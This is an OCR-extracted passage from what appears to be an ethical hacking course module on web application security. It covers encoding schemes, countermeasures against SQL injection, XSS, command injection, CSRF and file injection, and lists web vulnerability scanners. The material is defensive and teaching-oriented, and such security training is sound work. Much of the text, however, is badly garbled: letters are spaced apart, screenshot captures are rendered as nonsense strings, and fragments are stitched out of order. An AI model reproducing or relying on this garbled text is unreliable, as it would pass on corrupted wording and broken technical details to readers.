-------- ----- --------- —
—
ID - : a te M e th o d H ost P a th P a ra m e te rs S t a tu s O r ig in I
ד 2 U 0 B Z D E /2 X T U fc 1 h ttp ://w w w . o w a s p . 0r g : 8 U /S K in s /m o n o D O O K fm a in 'N 2UU U K P ro x y A
4 2 0 0 6 /0 6 /2 3 . .. G E T h ttp ://W w w .o w a s p . 0r g : 8 0 / s k in s / c o m m o n / I E F t t e s . 200 OK P ro x y ־־
י III 1 ►
i . 2 7 / 6 3 .5 6
F IG U R E 1 3 .6 0 : W e b S c a ra b T o o l S c re e n s h o t
M In s ta n t S o u rc e
h t t p : / / w w w . b la z in g t o o ls . c o m
H ttp B e e
h t t p : / / w w w . oO o. n u
■ a — s ־
w 3 a f T e le p o r t P ro
h t t p : / / w 3 a f . s o u r c e fo r g e , n e t ^ ► ^4) h ttp : / / w w w .te n m a x . c o m
G N U W g e t W e b C o p ie r
h t t p : / / g n u w in 3 2 . s o u r c e f o r g e , n e t h t t p : / / w w w . m a x im u m s o f t . c o m
י
B la c k W id o w
h t t p : / / s o f t b y t e la b s . c o m
& H T T T R A C K
h t t p : / / w w w .h tt r a c k . c o m
f£3 c U R L
h t t p : / / c u r I. h a x x . s e
M ile S C A N P a ro s P ro
h t t p : / / w w w . m ile s c a n . c o m
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
/ \ W e b A p p lic a tio n H a c k in g T o o ls
© H i l l RACK a v a ila b le a t h t t p : / / w w w . h t t r a c k . c o m
ModuleFlow
W e b A p p Pen T e s tin g
0 יI, W e b A p p C o n c e p ts
S e c u rity T oo ls
q y
& W e b A p p T h re a ts
C o u n te rm e a s u re s
W e b A p p lic a tio n H a c k in g T o o ls
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
^־־ M o d u le F lo w
V W e b A p p P en T e s tin g /jj&Mk W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
•.r"
C o u n te rm e a s u re s e5=־ H a c k in g M e th o d o lo g y
(j ' י
m
W e b A p p lic a tio n H a c k in g T o o ls
vf 1
EncodingSchemes CEH
w a y y o u in te n d
a % 0a N e w lin e
« %20 space
A n H T M L e n c o d in g s c h e m e is used t o re p re s e n t u n u s u a l
c h a ra c te rs so t h a t th e y c a n be s a fe ly c o m b in e d w ith in an
HTML d o c u m e n t
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
E n c o d in g S c h e m e s
— —־ HTTP p ro to c o l a n d th e H T M L la n g u a g e a re th e tw o m a jo r c o m p o n e n ts o f w e b
a p p lic a tio n s . B o th th e s e c o m p o n e n ts a re te x t b a se d . W e b a p p lic a tio n s e m p lo y e n c o d in g
s c h e m e s t o e n s u re b o th th e s e c o m p o n e n t h a n d le u n u s u a l c h a ra c te rs a n d b in a r y d a ta s a fe ly .
T h e e n c o d in g s c h e m e s in c lu d e :
m U R L E n c o d in g
Q %3d
Q %0a New l i n e
9 %20 space
> H T M L E n c o d in g
Q &am p; &
e & g t; >
E n c o d in g S c h e m e s CE H
( C o n t 1(!)
tt Exam ple:
Jason 123B684A D 9
E n c o d in g S c h e m e s ( C o n t ’d )
Unicode Encoding Base 64 Encoding Hex Encoding
U T F -8
It is a variable-length encoding
standard that uses each byte
expressed in hexadecimal and
preceded by the %prefix:
%c2%a9
%«2%89%a0
TABLE 1 3 .2 : E n c o d in g S c h e m e s T a b le
L im it th e le n g th o f u s e r in p u t
Use c u s to m e r r o r m essages
D isable c o m m a n d s lik e x p _ c m d s h e ll
Is o la te d a ta b a s e s e rv e r a n d w e b s e rv e r
JT
1 A lw a y s use m e th o d a ttr ib u te s e t t o POST
M o v e e x te n d e d s to re d p ro c e d u re s t o an is o la te d s e rv e r
SQL
Server V a lid a te a n d s a n itiz e user in p u ts passed t o th e d a ta b a s e
H o w to D e f e n d A g a in s t S Q L I n je c tio n A tta c k s
T o d e f e n d a g a i n s t S Q L i n j e c t i o n a t t a c k s , v a r i o u s t h i n g s h a v e t o b e t a k e n c a r e o f l i ke
u n c h e c k e d u s e r -in p u t to d a t a b a s e - q u e r i e s sh o u ld n o t b e a llo w e d to pass. Every u s e r v ariab le
p a s s e d to th e d a t a b a s e sh o u ld b e v alid a te d a n d sanitized. T he given in p u t sh o u ld be c h e c k e d
f o r a n y e x p e c t e d d a t a t y p e . U s e r i n p u t , w h i c h is p a s s e d t o t h e d a t a b a s e , s h o u l d b e q u o t e d .
e Limit t h e l e n g t h o f u s e r i n p u t
e M o n i t o r DB t r a f f i c u s i n g a n IDS, W A P
e D i s a b l e c o m m a n d s like x p _ c m d s h e l l
e Isolate d a t a b a s e s e rv e r a n d w e b se rv e r
e A lw ay s u s e m e t h o d a t t r i b u t e s e t t o POST
Q U s e l o w p r i v i l e g e d a c c o u n t f o r DB c o n n e c t i o n
0 / H o w to D e f e n d A g a in s t C o m m a n d I n je c tio n F la w s
^׳ ' The sim plest way to protect against com m and injection flaws is t o avoid them
w h e r e v e r p ossible. S o m e la n g u a g e specific libraries p e r f o r m id entical fu n c tio n s fo r m a n y shell
c o m m a n d s a n d s o m e s y s t e m calls. T h e s e li b ra ri e s d o n o t c o n t a i n t h e o p e r a t i n g s y s t e m shell
i n t e r p r e t e r , a n d s o i g n o r e m a x i m u m s h e l l c o m m a n d p r o b l e m s . F o r t h o s e c a l l s t h a t m u s t still b e
u s e d , s u c h a s c a l l s t o b a c k e n d d a t a b a s e s , o n e m u s t c a r e f u l l y v a l i d a t e t h e d a t a t o e n s u r e t h a t it
d o e s n o t c o n t a i n m a l i c i o u s c o n t e n t . O n e c a n a l s o a r r a n g e v a r i o u s r e q u e s t s in a p a t t e r n , w h i c h
e n s u r e s t h a t all g i v e n p a r a m e t e r s a r e t r e a t e d a s d a t a i n s t e a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t .
M o s t s y s t e m calls a n d t h e u s e o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t valid i n p u t
strings to a c c e ss a d a t a b a s e or p r e p a r e d s t a t e m e n t s pro v id e significant p ro te c tio n , e n su rin g
t h a t t h e s u p p l i e d i n p u t is t r e a t e d a s d a t a , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e
risk involved in these external calls. One can alw ays authorize the input to ensure the
p r o t e c t i o n o f t h e a p p l i c a t i o n in q u e s t i o n . L e a s t p r i v i l e g e d a c c o u n t s m u s t b e u s e d t o a c c e s s a
d a t a b a s e s o t h a t t h e r e is t h e s m a l l e s t p o s s i b l e l o o p h o l e .
T h e u s e o f a n e x t e r n a l c o m m a n d t h o r o u g h l y c h e c k s u s e r i n f o r m a t i o n t h a t is i n s e r t e d i n t o t h e
c o m m a n d . C r e a t e a m e c h a n i s m f o r h a n d l i n g all p o s s i b l e e r r o r s , t i m e o u t s , o r b l o c k a g e s d u r i n g
t h e c a l l s . T o e n s u r e t h e e x p e c t e d w o r k is a c t u a l l y p e r f o r m e d , c h e c k all t h e o u t p u t , r e t u r n , a n d
e r r o r c o d e s f r o m t h e call. A t l e a s t t h i s a l l o w s t h e u s e r t o d e t e r m i n e if s o m e t h i n g h a s g o n e
w rong. O therw ise, an attack m ay occur and never be d e te c te d .
© U s e a s a f e API t h a t a v o i d s t h e u s e o f t h e i n t e r p r e t e r e n t i r e l y
© U s e p a r a m e t e r i z e d SQL q u e r i e s
© Escape d a n g e ro u s characters
1 3 x 5 _ 7
▼
2
% 4 6 8
/
\ / \ y
U se a w e b F ilt e r in g s c r ip t o u t p u t C o n v e r t a ll n o n - D e v e lo p s o m e s ta n d a rd o r
a p p lic a tio n f ir e w a l l c a n a ls o d e f e a t XSS a lp h a n u m e r ic c h a ra c te rs s ig n in g s c rip ts w ith p r iv a te
t o b lo c k t h e v u l n e r a b il it ie s b y t o H T M L c h a r a c te r a n d p u b lic k e y s t h a t
H o w to D e f e n d A g a in s t X S S A tta c k s
| T h e f o l l o w i n g a r e t h e d e f e n s i v e t e c h n i q u e s t o p r e v e n t XSS a t t a c k s :
Q C h e c k a n d v a l i d a t e all t h e f o r m f i e l d s , h i d d e n f i e l d s , h e a d e r s , c o o k i e s , q u e r y s t r i n g s , a n d
all t h e p a r a m e t e r s a g a i n s t a r i g o r o u s s p e c i f i c a t i o n .
© I m p l e m e n t a s t r i n g e n t s e c u r i t y policy.
© F il te r t h e s c r i p t o u t p u t t o d e f e a t XSS v u l n e r a b i l i t i e s w h i c h c a n p r e v e n t t h e m f r o m b e i n g
tra n sm itte d to users.
© T h e e n t i r e c o d e o f t h e w e b s i t e h a s t o b e r e v i e w e d if it h a s t o b e p r o t e c t e d a g a i n s t XSS
a t t a c k s . T h e s a n i t y o f t h e c o d e s h o u l d b e c h e c k e d b y r e v i e w i n g a n d c o m p a r i n g it a g a i n s t
e x a c t specifications. T h e a r e a s sh o u ld b e c h e c k e d as follow s: t h e h e a d e r s , as well as
© There are many ways to encode the known filters fo r a c tiv e content. A "positive
s e c u r i t y p o l i c y " is h i g h l y r e c o m m e n d e d , w h i c h s p e c i f i e s w h a t h a s t o be allow ed and
what has to be rem oved. N egative or attack signature-based policies are hard to
m aintain, as th e y are incom plete.
S e c u re t h e r e m o te a d m in is tra tio n
a n d c o n n e c tiv ity te s tin g
P r e v e n t use o f u n n e c e s s a ry
C o n fig u re t h e f ir e w a ll t o fu n c tio n s s u c h as g e ts , s trc p y ,
d e n y e x te r n a l I n te r n e t a n d r e tu rn a d d re s s e s fr o m
C o n tr o l M e s s a g e P ro to c o l o v e r w r it t e n e tc .
P re v e n t t h e s e n s itiv e
in fo r m a tio n
f r o m o v e r w r itin g
D a ta p ro c e s s e d b y th e
a tta c k e r s h o u ld b e s to p p e d
f r o m b e in g e x e c u te d
P e rfo rm th o r o u g h
in p u t v a lid a tio n
H o w to D e f e n d A g a in s t D o S A tta c k s
ל T h e f o l l o w i n g a r e t h e v a r i o u s m e a s u r e s t h a t c a n b e a d o p t e d t o d e f e n d a g a i n s t DoS
attacks:
0 P e rfo rm t h o r o u g h in p u t validation.
M a in ta in and u p d a te a secure
re p o s ito ry o f XM L schem as
H o w to D e f e n d A g a in s t W e b S e rv ic e s A tta c k s
© C onfigure WSDL A ccess C ontrol Perm issions to g ran t or d en y access to any type of
W SD L-based SOAP m e s sa g e s.
© U s e d o c u m e n t - c e n t r i c a u t h e n t i c a t i o n c r e d e n t i a l s t h a t u s e SAML.
© Block e x t e r n a l r e f e r e n c e s a n d u s e p r e - f e t c h e d c o n t e n t w h e n d e - r e f e r e n c i n g URLs .
© D e p l o y w e b - s e r v i c e s - c a p a b l e f i r e w a ll s c a p a b l e o f S O A P - a n d ISAPI-level filterin g.
Q M a in ta i n a n d u p d a t e a s e c u r e r e p o s i to r y o f XML s c h e m a s .
8 N e v e r s u b m it session d a ta as p a rt
o f a GET, POST
W e b A p p lic a tio n C o u n te r m e a s u r e s
A v o i d u s i n g r e d i r e c t s a n d f o r w a r d s if d e s t i n a t i o n p a r a m e t e r s c a n n o t b e a v o i d e d ; e n s u r e t h a t
t h e s u p p l i e d v a l u e is v a l i d , a n d a u t h o r i z e d f o r t h e u s e r .
Cross-Site R e q u e s t Forgery
© Log o f f i m m e d i a t e l y a f t e r u s i n g a w e b a p p l i c a t i o n a n d c l e a r t h e h i s t o r y .
© Do n o t a l l o w y o u r b r o w s e r a n d w e b s i t e s t o s a v e login d e ta i ls .
© C h e c k t h e H T T P R e f e r r e r h e a d e r a n d w h e n p r o c e s s i n g a P O S T , i g n o r e URL p a r a m e t e r s .
© U s e SSL f o r all a u t h e n t i c a t e d p a r t s o f t h e a p p l i c a t i o n .
© V e r i f y w h e t h e r all t h e u s e r s ' i d e n t i t i e s a n d c r e d e n t i a l s a r e s t o r e d in a h a s h e d f o r m .
© N e v e r s u b m i t s e s s i o n d a t a a s p a r t o f a G ET , P O S T .
© E n s u r e t h a t e n c r y p t e d d a t a s t o r e d o n d i s k is n o t e a s y t o d e c r y p t .
e
such as U nicode to affect th e d ire c to ry trave rsal
S Im p le m e n t cookie's tim e o u t
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
© N o n - S S L r e q u e s t s t o w e b p a g e s s h o u l d b e r e d i r e c t e d t o t h e SSL p a g e .
© C o n f i g u r e SSL p r o v i d e r t o s u p p o r t o n l y s t r o n g a l g o r i t h m s .
© E n s u r e t h e c e r t i f i c a t e is v a l i d , n o t e x p i r e d , a n d m a t c h e s all d o m a i n s u s e d b y t h e s i t e .
© B a c k e n d a n d o t h e r c o n n e c t i o n s s h o u l d a l s o u s e SSL o r o t h e r e n c r y p t i o n t e c h n o l o g i e s .
D irectory T raversal
© W e b s e r v e r s s h o u l d b e u p d a t e d w i t h s e c u r i t y p a t c h e s in a t i m e l y m a n n e r .
© D o n o t s t o r e p l a i n t e x t o r w e a k l y e n c r y p t e d p a s s w o r d in a c o o k i e .
© Im p le m e n t cookie's tim e o u t.
© C o o k i e ' s a u t h e n t i c a t i o n c r e d e n t i a l s s h o u l d b e a s s o c i a t e d w i t h a n IP a d d r e s s .
0 M a k e lo g o u t fu n c tio n s available.
S ecurity File I n j e c ti o n
M isconfiguration A ttack
Configure all security Perform type, pattern, and Strongly validate user input
mechanisms and tu rn o ff all d om a in value va lid a tio n on all
C onsider im plem enting a
unused services input data
c h ro o t ja il
Setup roles, permissions, and Make LDAP filte r as specific as
PHP: Disable a llo w _ u rl_fop e n
accounts and disable all possible
and a llow _url_include in
d e fa u lt accounts orchange Validate and re strict the
php.ini
th e ir d efa ult passwords a m o u n t o f data re tu rn e d to
th e user PHP: Disable register_globals
Scan fo r latest security
and use E_STRICTtofind
vulnerabilities and apply the Im plem ent tig h t access c o n tro l
uninitialized variables
latest se curity patches on th e data in th e LDAP
d ire cto ry PHP: Ensure th a t all file and
Perform d yna m ic testin g and stream s fu n c tio n s (stream _*)
source code analysis are ca refu lly ve tte d
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
Security M isconfiguration
© C o n f i g u r e all s e c u r i t y m e c h a n i s m s a n d t u r n o f f all u n u s e d s e r v i c e s .
© S e t u p r o l e s , p e r m i s s i o n s , a n d a c c o u n t s a n d d i s a b l e all d e f a u l t a c c o u n t s o r c h a n g e t h e i r
default passw ords.
LDAP I n j e c t i o n A t t a c k s
© P e r f o r m t y p e , p a t t e r n , a n d d o m a i n v a l u e v a l i d a t i o n o n all i n p u t d a t a .
© M a k e L DA P f i l t e r s a s s p e c i f i c a s p o s s i b l e .
© I m p l e m e n t t i g h t a c c e s s c o n t r o l o n t h e d a t a in t h e L D A P d i r e c t o r y .
© P e rf o rm d y n a m ic te s tin g a n d s o u r c e c o d e analysis.
File I n j e c t i o n A t t a c k
© C o n s i d e r i m p l e m e n t i n g a c h r o o t jail.
© P H P : D i s a b l e a l l o w _ u r l _ f o p e n a n d a l l o w _ u r l _ i n c l u d e in p h p . i n i .
© PH P : D i s a b l e r e g i s t e r _ g l o b a l s a n d u s e E_STRICT t o f i n d u n i n i t i a l i z e d v a r i a b l e s .
© P H P : E n s u r e t h a t all f i l e a n d s t r e a m s f u n c t i o n s ( s t r e a m _ * ) a r e c a r e f u l l y v e t t e d .
H o w to D e f e n d A g a in s t W e b
C E H
A p p lic a tio n A tta c k s
M a k e LD A P f i l t e r
as s p e c ific a s p o s s ib le
To defend against web application attacks, you can follow the counterm easures
s t a t e d p reviously. To p r o t e c t t h e w e b s e r v e r, y o u c a n u s e W AF firew all/ID S a n d filter p a c k e ts .
You n e e d t o c o n s t a n tl y u p d a t e t h e s o f t w a r e using p a t c h e s to k e e p t h e s e r v e r u p - t o - d a t e a n d to
protect it f r o m attackers. Sanitize and filter u s e r input, analyze the source code f o r SQL
injection, a n d m in im iz e u se of th i r d - p a r ty a p p lic a tio n s to p r o t e c t t h e w e b ap p licatio n s. You can
also u se s to re d p r o c e d u r e s a n d p a r a m e t e r q u e rie s to retrie v e d a ta a n d disable v e r b o s e e rr o r
m e s sa g e s, w hich can guide th e a tta c k e r w ith s o m e useful in fo rm atio n an d u se c u sto m e rro r
p a g e s t o p r o t e c t t h e w e b a p p l i c a t i o n s . T o a v o i d SQL i n j e c t i o n in t o t h e d a t a b a s e , c o n n e c t u s i n g a
n o n -p r iv ile g e d a c c o u n t a n d g r a n t le a s t privileges to t h e d a t a b a s e , ta b le s, a n d c o lu m n s . D isable
c o m m a n d s like x p _ c m d s h e l l , w h i c h c a n a f f e c t t h e O S o f t h e s y s t e m .
5
_
Keep
Use WAF Firewall patches
Attacker Login Form Internet
/IDS and filte r packets current
M o d u l e F lo w
W e b A pp P en Testing W eb A pp C oncepts
0 י I,
W eb A pp Threats
&
^־־ M o d u le F lo w
N o w w e wi l l d i s c u s s w e b a p p l i c a t i o n s e c u r i t y t o o l s . W e b a p p l i c a t i o n s e c u r i t y t o o l s
h e l p y o u t o d e t e c t t h e p o s s i b l e v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s a u t o m a t i c a l l y . P r i o r t o t h i s ,
w e discussed w e b application c o u n te r m e a s u re s th a t p re v e n t attack ers from exploiting w e b
a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u c a n a l s o e m p l o y s e c u r i t y t o o l s t o p r o t e c t
y o u r w e b a p p l i c a t i o n s f r o m b e i n g h a c k e d . T o o l s in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e
protection.
^ W e b A pp P en T esting W e b A pp C oncepts
O k
A c u n e tix W e b V u ln e r a b ility S c a n n e r i
services
08Msam«r :
OHTTPEdto־
» O cn > * site sc ro trg (v en ted) CIO)
£ Q SQ
L׳ip ar (21)
west wtneoMtMS 3rd conpro׳T;« tne 1
backend database anfl'or de*xe you'
^ *Hnpsmrte י יO *׳od ca ccn er o r ireseace (3]
e Tests w e b fo r m s a nd p a s s w o rd - vfc HTTPPUZJC••:׳ 9-{l)
S A1.rt*>P*־׳n« « '׳fpe*r » O ASPJETef««r ■ne*M
ft O Crow Prone Senjlrtg (S] S ToUl alctto found
p r o te c te d areas »C O w e < te * J t
9 O U « .* J e - 0J s a « « 1* n t n Jeai O High
»web S<rvcc & O Mwllum
» O lo on p flg etW M o o'd o u ew rgo tta c
s It in c lu d e s an a u to m a tic c lie n t
Web Se^vrr* Searme ^ :״
Web Se ׳v«?e* td * r 9 O OPTIONS * c t o d ■ en eb lid (1) O>nw
B-itJ Co*־־91x«ton S ^ S n w i C o d » * V iau l S k u f Dai) 1 O informational
s c rip t a n a ly z e r a llo w in g f o r »1 ^ b-cr psoc web sarvar ׳c 90 ׳r dad
•• S:**״
,•Hl'gv >■ ^ 0 0 6 : Prcntp•^ ntpnikn* for l>1i 2j target information ht1p://tett 81pnetvuinweb ri
s e c u rity te s tin g o f A jax and W eb 5:«™־1j< «׳ot
» O < * 06 : :' 0e® tx a y .r e t se r s < מc fl
2 .0 a p p lic a tio n s li 1CTGeneral i 9 008: logn page CIO)
7123 MQuMti
S P^ff-ae'U»a»tr5
Verso ״Infwm own fi O type Input wltt *utocofttd v Stan It flnuhtd
t \ S^part Ctntm
<L
Ytrr.o+1
-g ) LKr :0.2001:30.02.SQLn«a־n ״״׳-Srd) ■fr,mine»t.a%px' a
10*0 O l J i J / , Mushed scanning.
UMT M«1.« (p0C ] £
: ״AcuStrsa ■ 4
0
10.20 01:22.32, Savno scan re»J!3 זdatabase...
12.20 01:32.39, Dcnr wv n , b d 9 » « r.
10.2001:32.39,Fua «*־D uffer*.
http://www.acunetix.com
C opyright © by EC-Gauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
V u ln e r a b ility S c a n n e r
A cunetix W eb V ulnerability Scanner autom atically checks your web applications for S QL
i n j e c t i o n , XSS, a n d o t h e r w e b v u l n e r a b i l i t i e s . It i n c l u d e s a d v a n c e d p e n e tra tio n testin g tools,
such as th e HTTP E d it o r a n d t h e H T T P F u z z e r . It p o r t s c a n s a w e b s e r v e r a n d runs security
c h e c k s a g a i n s t n e t w o r k s e r v i c e s . It e v e n t e s t s w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a r e a s . T h e
a u to m a ti c client script an aly z er allow s for secu rity te s tin g of A jax a n d W e b 2.0 a p p lic a tio n s.
|Tools Explore; 0 ן j ^ * י־׳ A Report / Star: UR.: http://testaspnet.vulrwel ▼ | Profile: |Default - a star:
|a | Web Vulnerablity Scanner
w eb scanner ®
Scan Results Alwtssummary 77 alerts
- [a ] Scan Thread 1 ( http://testaspnetvuhweb. ׳-•
B 0 7 Toola
B Web Alerts (77) Acun etix Threat Level 3
H 5 fr Site Crawler A a c u n e tix th re a t lev el
\״״f i Target Finder (3 0 ASP .NET Padcmg Drade V iin erab* One or more hig hse veritytyp e
ffl 40 bind SQL injenxx• (8)
Level 3: High vulnerabilities have been discovered by
.......... Subdcmain Scanner
the scanner. A malicious user can exploit
Bind SQL Injector @ S ^ Cross Site Scrpbng (verified} (10) these vulnerabilities and compromise the
HTTP Editor ^ B 0 SQL injection (verified] (21) backend database an d /o r deface your
HTTP Sniffer website.
B C Application error messaoe (3)
H I HTTP Fuzzer
B 0 ASP.NET error message (1)
h - d Authentication Tester Total alerts fo u nd
B 0 Cross Fra-ne Scripting (6)
:~ ״j y Compare Resdts 0 Hig h
B 0 User credentials a־e sent in dear te.
B - f i? Web Servces
B 0 Login page password-guessing attec
O M edium
Web Servces Scanner
B 0 CPTIONS metnod s erabled (1) O low
Web Servces Editor }*£ —
B Configuration B ^ Session Cookie without Secure flag £ 0 Inform atio nal
S i Application Settinos •■
■••; B 0 Error page Web Serve ׳versior dsd
h - 8 Scan Settings B 0 QHDB: Frontpage extensions for Uni ,jj Target inform ation t!ttp://testaspnet.vulnweb.com:80/ ©
....Scannng Profiles 23<
B 0 QHDB: Possible ASP.fCT sensitve i
H - f ^ r Generol
B 0 Q O B : Tywcallogh p a je (10)
^ ^ ta b ftia 7322 requests ©
Program Lpdates ^
B 0 Password type input with autocompT v 1 * Progress scan is rmisned 100.00% @
C T Version Information--
j f Licensng• <|_ M
l j | >| 1
support center
Activity V/indow
Purchase
)User Manual (html 10.20 01:30.02, SQL njection (venfied) Treadnews.aspx* cn pararreter *id'
User Manual (pdf ]£<( 10.20 01:3237, Finished scanning.
10.20 01132.37, Saving scon results todatabatc ..
'•••״# AcuSensor
10.20 01:32.39, Done saving to database.
10.20 01:32.39, Hush Ne butlers. □
|A ^ icaton''(^ ]| Error Log
Ready
₪ Pas Lockfor*■׳ac!i«<»nar1pc4cytiks
J Header - ChecktM cathe-caMml HTTP header met to the regorg' vAx
that aCortart -Typeneattr Uhciuded h ths HTTPresponseand^e>t8whent 3* « 0 * ₪ <*וי
• ׳Header Cheeksthat IE?* XSSproteetenBier Koar»tf been ebabledbythe Webappteabon
OncMiHattheXCONTENT-TYPEOPTONSiJefcnje aflarvt MlME«fRnflha»b»»n dedjred ₪
J Header Cheeksth®!he XfRAMEOPTlONS■headern berg set for defer®• aqaral CkkJaefcro'attacks
B Heady Lccfcter «■«■ahAfrytlcalicr prctooolr
0 rtor*״ten 0<ac*«*re Owck for conwon 9׳mt mMoagw wtLinsdby database* *Hcfi may rd a e 9311! *toow• SDLO*
ז7 ןrfy -Bcn Dadeare Oteekfor dubom eoiment• that vnairartfuther attention M/A
7 rtomaton D*3c»je LooHlotevMlNe rtamatieripajesdttrojtfi HTTPwjjwt ul«twl*w*»a OWASPASV12
look for semttve rfenrater paiied Ihrou^i URL [Mrarreteis OWASf ASVU
fTiJa<*«utrt-bu׳wr«^׳r*1crt«coJ*foruwc<d#>3r0usr׳ji1)fTK<J«xh w».'.wBSX
TSrt ־>■*׳־k mil srnnrh MTMl convnt, ineludmo comment! k common error mrsinor *־returned by ptmtewns sue♦! as ( 6w»׳t ) Export NeAod• HTNLRwott
Af.PNTT and Web savers such 09 IIS ond Apoebe Y<hh 1ftonfioure Ibe l!v of common debug mer-wiges » look ter
it* nge •** *יttbamg URU
'S o J ft*.'* r-otfcuBtad.tan/m•febw/Ch««fc. Pmv.ltwCanbeUd.Jr/aiu vl£v«<t.1;>v?ul mrTMtVdw*
r r t t h o S c » r c lavaanix ivonti Ahrti may bo afrart»׳vmtrelUft*a׳
1J l»*i n w «•« Anrd m #»• ♦ 0 נז40** יdata of an crto.nl' events
C 3 S 3 B 3 watdier Web Security Tool vt.3.0, Copyright C• 2010 C3;3ba ..C- AJI djitts reserved- casasa Aatc «־V/cDSecurity Tool vlJ.O, CooyriQht©20:0 Casaoa Security. LLC. All risnu reserved.
http://www.casaba.com
Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
J L T o o l
W a t c h e r is a p l u g i n f o r t h e F i d d l e r H T T P p r o x y t h a t p a s s i v e l y a u d i t s a w e b a p p l i c a t i o n t o f i n d
security bugs and com pliance issues autom atically. Passive detection means it's safe for
p r o d u c t i o n u s e . It d e t e c t s w e b - a p p l i c a t i o n s e c u r i t y i s s u e s a n d o p e r a t i o n a l c o n f i g u r a t i o n i s s u e s .
FIGURE 1 3 .6 3 : W a tc h e r W e b S e c u rity T o o l S c re e n s h o t
s fa 11
יCMnWSw
C ro s s -s ite S c rip tin g
c
URL l a x / / 1c5tJ7.ne2Mrt«r.cQm:8l8! 1 fflefwra/MSiDyreftected32 ׳
P* * — ד• ׳H •* 010 ! י * »־$ j ׳. Krtpt:
PARAMETER
ptram
MAME
PARAMETER
TVPC (Jjfryitnnj
ATTACK
PATTtftM «»a|p1»4k»t(0»0000l&)< ח
ג C L A S S IF IC A T IO N
V U L N E R A B IL I T Y D E T A IL S
XSS (O w rM t SoHAmu) d v «1 mn tv «*«-.**« • ki :.0 t u
dr«»*on1 kjhA (!••**C'pC V W c 1 <«(>* ׳U o*
a0pbcat»n T**s 1 lo«c y t i * o*p4rtun*14« K l ו.נ L iii
moith t♦ •־cvr<nt ■Mixyi * x m«r t* tfunfm] Vm
kvoV (4 rtw* 0 M)* b» * ♦יwtvi anrt»*yro<t»*m» OWAV a:
♦ ■ ^ ר־ז־י־י
*
9
Croupbuctb)’
Ml Vjlnt<jb1KvT>o«
ScarandConfarratcnfirntsd J fV
ory:SystemlMoneJ
Q ] tcrst37.nebpdrker.eom - N etip aike i 2.0.0.0 ( M avituna Security Lim ited - 1 Seat) 1 5 1 ־r s 1 ־r w 1
FIGURE 1 3 .6 4 : N e ts p a rk e r T o o l S c re e n s h o t
W e b A p p lic a t io n S e c u r it y T o o l: N ־S ta lk e r
W e b A p p lic a t io n S e c u r it y S c a n n e r
EH
Ifryfr > 1 » > 1 N־S:alker Web Application Security Scanner2012 - Free Edition
J N-Stalker Web Application N—' MM -Suia
-S krerSS
ke en
en w׳
tner Scan Cffcr«i
I r. -»:«n AtMMffl 0
1 i>
Sw Mjojo , .. a ׳T»>«־rh
5'.«U.» 1• S'.atei Sca' -W h brae a
http://nstalker.com
: Mtp:i/10.0.0-2/ f t Scanner
a Dashboard
* C onplK* ^ Co«o.«ed + (
SitaSequance )5 N Sp11»r \ Irto N (
J j Allowed Hoste
Rejected hosts % . 0 7 ׳MS D m *(
C i Oojects
Jjl Ccckes ScanSessba __
Scrpts - ) 11( Star; Tme Dc2C.2312 3-*:3©:53
Mp Comments )11( C Heera 4 M r jte3
n Web Forms )5(
) ר־■־E-tnats Spider £ י9»♦י 8
j p Broten pages ) 1( Craw ed URLs 15 03
Hidden FtekJs Crawled boss 1
Information Leakage ) 1 Defaui Paje Sz t 56.117 Dries high 10) Ni l (9) Low (1) inro (2)
jnerablities / ' 0 ScmEngoe s rutwort *
J ht1p//l0 )+( 0 0 2/ To;® Recues3 2926 Bytes Sent 901.526
Fated Requests 0 6 vies Received 2.029 110
Attacks Serf 315 A *0 Resconse Time 35 25 ms
*04 Errors 2617 avq Transref Rite 1.752 88 kb / s
30? Redreeten 0 Reajest^Wrute 731 00 reo/mn
W e b A p p lic a t io n S e c u r it y T o o l:
V a m p ir e S c a n
EH
F eatu res
e P ro te c t y o u r w e b s ite fro m
hackers
e Scan and p r o te c t y o u r
in fra s tru c tu re a n d w e b
a p p lic a tio n s f r o m c y b e r-
th re a ts
© G ive y o u d ire c t,
a c tio n a b le in s ig h t o n
high, m e d iu m , a n d lo w
risk v u ln e ra b ilitie s
http://www.vampiretech.com
1 S u mma r y
Status W rt Site URl Drvnplion Smncr latr*t Re*uft% Rev** Grade HARM Vuln. Previous Scam
Q o w \ R u ntw V«*c M/M/l
scanteil? Q wSan HtathOeck 3/28/2012 2*2 PM mm 2960 6/2/0
%can»e*11 SMf 3/27/2012 2:17 PM mm 289• 193/214/271
scan!e*M •roftW 3/24/2012 •:12 AM mm 2314 124/148/113
*cant**11 M#a*rvO>eA 3/13/2012 1053 AM 4370 12/1/0
scanle*l? SMr 12/1S/20U 5:18 PM mm 14634 44/42/65 &M Htory
© * 4 ? *• \ Of I » >׳
Show. S 10 20 SO 100 200
IH L T S a n d c a tM in i W e b s e c u rify
h ttp ://w w w .s y h u n t.c o m h t t p : / / w w w . w e b s e c u r ify . c o m
O W A S P ZAP N e tB r u te
h t tp : //w w w . ow a sp. o rg h t t p : / / w w w . r a w lo g ic . c o m
W SS A - W e b S ite S e c u r ity
S e c u B a t V u ln e r a b ility S c a n n e r
h t t p : / / s e c u b a t . c o d e p ie x . c o m
f t . S c a n n in g S e rvice
' h t t p s : / / s e c u r e . b e y o n d s e c u r it y . c o m
SPIKE P ro x y R a tp ro x y
h t t p : / / w w w . im m u n it y s e c . c o m h t t p : / / c o d e , g o o g le , c o m
